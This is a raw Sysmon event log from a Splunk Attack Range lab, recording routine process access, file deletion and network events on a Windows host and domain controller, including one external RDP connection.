07:54:28.310{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807990Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:28.310{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807989Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:28.310{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807988Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:28.310{0C1E0330-048F-60E8-0500-00000000D001}412428C:\Windows\system32\csrss.exe{0C1E0330-F534-60EB-8779-00000000D001}2024C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000807987Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:28.294{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F534-60EB-8779-00000000D001}2024C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000807986Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:28.295{0C1E0330-F534-60EB-8779-00000000D001}2024C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000807985Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:28.247{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=93142E1342EF9FA9C889B8643DF21FDD,SHA256=9EC1FB52FCDDC69B81EF7A1A8ED4CDB3083915722B58667436AFCEB4015106BB,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049689Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:20.081{466BC892-02AF-60E8-0F00-00000000CF01}360C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse191.96.168.180-61618-false10.0.1.14win-dc-890.attackrange.local3389ms-wbt-server 23542300x80000000000000001049688Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:28.450{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=35DA5F5B2D9F273039BDFC03DEACB530,SHA256=590E3C91D8411BD84D01C86820176AB530A4C7FED00171CA3BB3D7F2E01D10AA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049687Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:28.450{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0439134699D232368B70A37C122110DA,SHA256=8847F706C3A3861B29FBD450CF3C0E23B4EFDDC0D3CEDF5ED26748BEE52770C4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049692Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:29.780{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7D0FC47AD2EC1E3DE615681E7C7D8F96,SHA256=22D3D38401F21A4C4ABE35B43F7F55E596574E56FAD0A0F4F137640200346580,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808002Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:29.528{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=25752551721C55C6A8AA2402E9F88F6C,SHA256=B4601D6A47B358E54F5183B0C69385503AB1F3AB541FE8EE3F539079369B0DCF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808001Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:29.153{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7B9C53EEDF94D4E95A4AAB0A0FD6C3A3,SHA256=A46136480D4040EFAD0B5A64D0A85D45420A97D6FA48979A2890837CBEFF16A9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049693Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:30.795{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1A5405ABA91400865DF651F67F460B8F,SHA256=A92B8482D5EB2CCB9356DCDA9514956FDA7AD2FCA6E8135E75D4B35AC2F6265C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808004Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:30.278{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=201683BC755BB120062E66E73300547C,SHA256=1B987FF22A2458B9473BEBF1076E2C119AB31E013789E5AA188EBF9515AB692E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808003Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:30.107{0C1E0330-0490-60E8-1200-00000000D001}980NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=4DDADA910E1039A086D79E2B8C8D484E,SHA256=C5565FE7DB95043861158FCD1116223E8CC8D4170D6BCD97682BE88B05D1FF79,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049694Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:31.809{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4B153764F3C128F9404C3FF2165B9857,SHA256=37B93F395B46047F10A0B88D400527AB8F8EEBBF8429BE086E24859653C9C285,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808005Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:31.325{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FBC1AB14B39BD6673E4EB5332DFDB2C6,SHA256=1A3757B4EFEE9C9ACCABAF78DD304C1257513BE0DC8194C3C98DA451A32D98BB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049695Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:32.809{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BCC90E5C5E88E823679BFC0EEBA1122F,SHA256=D9320202A9AC00B3A01F91633CEDA4EB4F2AC747A204C2ABF873DFF4CF6B8980,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808006Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:32.325{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BA8ED28E3F25C8DF6C7BF8086409CCFA,SHA256=1FAF453AFC763864A62975CEB7E8FD27489EEC44B91C23ACD2D5B21B146021AD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049697Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:33.829{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A8927988CF9CA631DB3989A2207EB54A,SHA256=EF2065DB945D70E0B59EDF5DC3306E2CEC0F00059D340C321BAF7472E63105A0,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000808008Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:32.223{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57294-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000808007Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:33.419{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6DD3C5CDF0B3798310F074BA06B3014E,SHA256=71A62C4E7E1B3527F96B1B41E4F2A2676040F032949E90A1CFDE1CFCD3FB7B9B,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049696Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:25.619{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51060-false10.0.1.12-8000- 23542300x80000000000000001049698Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:34.845{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AAB00A6FB49F15847FC9E3E9474EB5A7,SHA256=5F52BED35CD5D6B30A826ADF410B10EABAFD78A7BD0994718C0ECD852100D268,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808009Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:34.425{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B671734691CC26DE1483DF1FF0F57E6D,SHA256=2B2B75E96192590B14CBDF859A3550FC3599C2351F58A08139B744B5A2F67D00,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049700Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:35.876{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A6EF4685CEA322CFCEAAD950566D855F,SHA256=F5243141CB9AE78292E77E3480A220076358ED50AE8D94E350B05DE784A186B8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049699Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:35.876{466BC892-F4EE-60EB-437D-00000000CF01}5240ATTACKRANGE\AdministratorC:\Program Files\Notepad++\notepad++.exeC:\Users\Administrator\AppData\Roaming\Notepad++\backup\AttackRangeSysmon.xml@2021-07-12_075428MD5=BEC53E6D4BE59D23EEBC911FA615E46C,SHA256=E223AAC236A5F16CA5D04404C205699C803B34647119E8DB1D59D561D10B6E89,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808010Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:35.440{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D2F47D418237552E5711B0C3F760CA57,SHA256=A962BA72DFE20F2B85743D5FB9865E2B291ED3B2D49286C48EF38A6AE3B86F82,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049701Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:36.907{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=331577CB248E58EE6BCB2ACD32D4E440,SHA256=632C6B2611558215A9974F066721B707D267F06F1A2D08A0525E724B5469D0C9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808011Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:36.456{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DDB0B0085C76E1BB0F411D3CA281890D,SHA256=1B3427C9E0D2FDCA1C2835F54ACA01E6B38F95E0EE0BE7EE733CED18B975B819,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049702Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:37.926{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9F29F09128DFB7EEA7911C42E5DD6A87,SHA256=BD9B721F306CB0CC603DB79D09DD59468E807635FD6BED63BD9A703D3505D7D4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808012Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:37.503{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F1A1E17D07FB0BB429E2E2BC9EE28F91,SHA256=528E4BEF6BB4A74FB02A51352AB05302A892FFE992D55EE12D0AFC61D01BD494,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049704Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:38.960{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9B2BB19C022D8DA422ED5DCCC32B886B,SHA256=5722FC2D3CDB9845DB8E013E0F0ECC402D4DB1C8223C8E928712B9759971C9EF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808013Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:38.519{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4CC4E180B071DFCE77D2C9D6F418832D,SHA256=120719C29FCF80D4DE22FDADD6695A1D8A2B7C456B97E014DD90D566A81AC6ED,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049703Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:38.560{466BC892-02AF-60E8-1200-00000000CF01}400NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=39B2D725911BA86CFC348CC490D43A58,SHA256=7277A60D83F128AD5C674EF64F6F20A772B7D7FA19E41383B9EC80E902DE3FC6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049706Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:39.976{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2516A41DF54C33CE10E2150460FDF664,SHA256=76599F0CC0567566D676B0C731E2832042C4E0B71894743D6B266B168EA63A6D,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000808015Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:38.214{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57295-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000808014Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:39.519{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=428486D83E5DA7B1D0A118BFCDFA9B3A,SHA256=6669902592890620A279A1C7A3B44BDC9FC1401A9E758E1B4F5B811A2211BE26,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049705Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:31.663{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51061-false10.0.1.12-8000- 23542300x80000000000000001049707Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:40.990{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=41E55168AE69B2DA3A9B32BECB6D6C76,SHA256=9E4E9E4998C2D19E1FECA230EF05567B33CAD52BE461EC245C6BE89E04BAC029,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808016Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:40.550{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7CA066E042EBE45269D48BE07EE8BA31,SHA256=389E21BAACC8E41C98135CA844B7D028CEDC9C0B71A83FC7FF8531DD4DBCD83B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049708Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:41.993{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=31E120D51247114FCD4674EFCB47A136,SHA256=C7AEEEB53A79E0C501E718ED35D445BC890EC12CC39EA7DFB2E65F32B54B91F0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808017Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:41.612{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=900F8B8E75672B75FC72718E69F4AC95,SHA256=4EDD066AE87B688D0046DB83C81BF5E710ACCF7FC8713B63FF3F722CAC221351,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808018Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:42.628{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7A41974E3F94F4A8A9F619783236BCCD,SHA256=200D77E981AF50DC9D5EDC45153D199DC017C2B778B8316B31344BDE7A77AE6C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808019Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:43.675{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BD249003A6E902506FEFCEBD33C3540B,SHA256=409DDD01B09CB3F22A9D9A39FA5BB508ED16869C68C79EBB7EE3F0349189BC47,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049709Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:43.004{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=749BA3142A85E3F14B3E359F49BB004C,SHA256=19DD5156138F9D570F9758DD4D660EA363E1A6E39FC70C9F58979C565F61C460,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000808021Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:43.229{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program 